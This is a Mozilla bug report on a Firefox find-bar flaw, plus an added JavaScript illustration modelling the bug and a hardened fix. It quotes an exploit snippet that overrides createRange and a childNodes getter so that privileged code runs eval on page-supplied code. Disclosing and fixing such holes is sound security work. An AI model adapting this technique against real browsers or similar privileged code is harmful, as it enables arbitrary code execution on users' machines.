Closed Bug 289081 Opened 20 years ago Closed 20 years ago

security hole in highlightDoc()

Categories

(Firefox :: Security, defect)

x86
Windows XP
defect
Not set
normal

RESOLVED DUPLICATE of bug 289074

People

(Reporter: moz_bug_r_a4, Assigned: dveditz)

Details

(Whiteboard: [sg:dupe 289074])

Attachments

(1 file)

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050319
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2

Vulnerability: arbitrary code execution

Vulnerable code: from highlightDoc() in findBar.js

    win = window._content;
    var doc = win.document;
    var body = doc.body;
    var count = body.childNodes.length;
    endPt = doc.createRange();
    endPt.setStart(body, count);

Exploit: Web pages can overwrite the getter and the method, such as the following. Usage of |eval| is similar to Bug 289074.

    eval.setStart = eval.call;
    eval.__proto__ = document.createRange();
    document.createRange = function() { return eval; };
    document.body.__defineGetter__('childNodes',
      function() { return { length : MALICIOUS_CODE }; });

I have confirmed that the following testcase works in:

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050404 Firefox/1.0.3
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b2) Gecko/20050404 Firefox/1.0+

Reproducible: Always

Steps to Reproduce:
Attached file testcase
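As an added illustration, not taken from the report or from Firefox's source: the bug class above modelled in plain JavaScript. A privileged caller reads properties straight off page-controlled objects; the page installs the same kind of getter and method overrides the report describes; a hardened reader resolves every property against the known native prototype instead, in the spirit of Gecko's XPCNativeWrapper. `Body`, `Document`, `tamper`, `nativeView` and the two highlight functions are constructed stand-ins, not real DOM or findBar.js code.

```javascript
// Constructed stand-ins for the DOM objects in the report; not Firefox code.
// Native behaviour lives on the prototypes, as it does for real DOM classes.
class Body {
  constructor() { this._kids = [1, 2, 3]; }
  get childNodes() { return this._kids; }
}
class Document {
  constructor() { this._body = new Body(); }
  get body() { return this._body; }
  createRange() { return { setStart: (node, offset) => `range@${offset}` }; }
}
// What a page can do: install own-property overrides on the live objects
// (the same shape of tampering the report shows with __defineGetter__).
function tamper(doc) {
  doc.createRange = () => ({ setStart: (node, offset) => `hijacked:${offset}` });
  Object.defineProperty(doc.body, 'childNodes', {
    configurable: true, get: () => ({ length: 'PAYLOAD' }),
  });
}
// Vulnerable pattern from highlightDoc(): the privileged caller reads
// doc.createRange and body.childNodes through the page's own objects.
function highlightUnsafe(doc) {
  const body = doc.body;
  const count = body.childNodes.length;
  const endPt = doc.createRange();
  return endPt.setStart(body, count);
}
// Hardened pattern: a view that resolves every property against the known
// native prototype, so own-property and __proto__ tampering is ignored.
// (A simplified model of what an XPCNativeWrapper gives chrome code.)
function nativeView(obj, proto) {
  return new Proxy(obj, {
    get(target, prop) {
      const desc = Object.getOwnPropertyDescriptor(proto, prop);
      if (!desc) return undefined;                  // not in the native interface
      if (desc.get) return desc.get.call(target);   // native accessor, not the page's
      return typeof desc.value === 'function' ? desc.value.bind(target) : desc.value;
    },
  });
}
function highlightSafe(doc) {
  const safeDoc = nativeView(doc, Document.prototype);
  const safeBody = nativeView(safeDoc.body, Body.prototype);
  const count = safeBody.childNodes.length;
  return safeDoc.createRange().setStart(safeBody, count);
}
const doc = new Document();
tamper(doc);
console.log(highlightUnsafe(doc), highlightSafe(doc)); // hijacked:PAYLOAD range@3
```

The unsafe reader hands whatever the page put in `childNodes.length` to whatever the page returned from `createRange()`, which is exactly the handoff the report turns into `eval.call` with chrome privileges; the wrapped reader never sees the overrides.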
Status: UNCONFIRMED → NEW
Ever confirmed: true
Blocks: sbb?
Flags: blocking-aviary1.0.3?
Blocks: 289187
Same eval problem as reported in bug 289074.

*** This bug has been marked as a duplicate of 289074 ***
No longer blocks: 289187
Status: NEW → RESOLVED
Closed: 20 years ago
Resolution: --- → DUPLICATE
Whiteboard: [sg:dupe 289074]
Flags: blocking-aviary1.0.3?
Group: security
Blocks: sbb+
No longer blocks: sbb?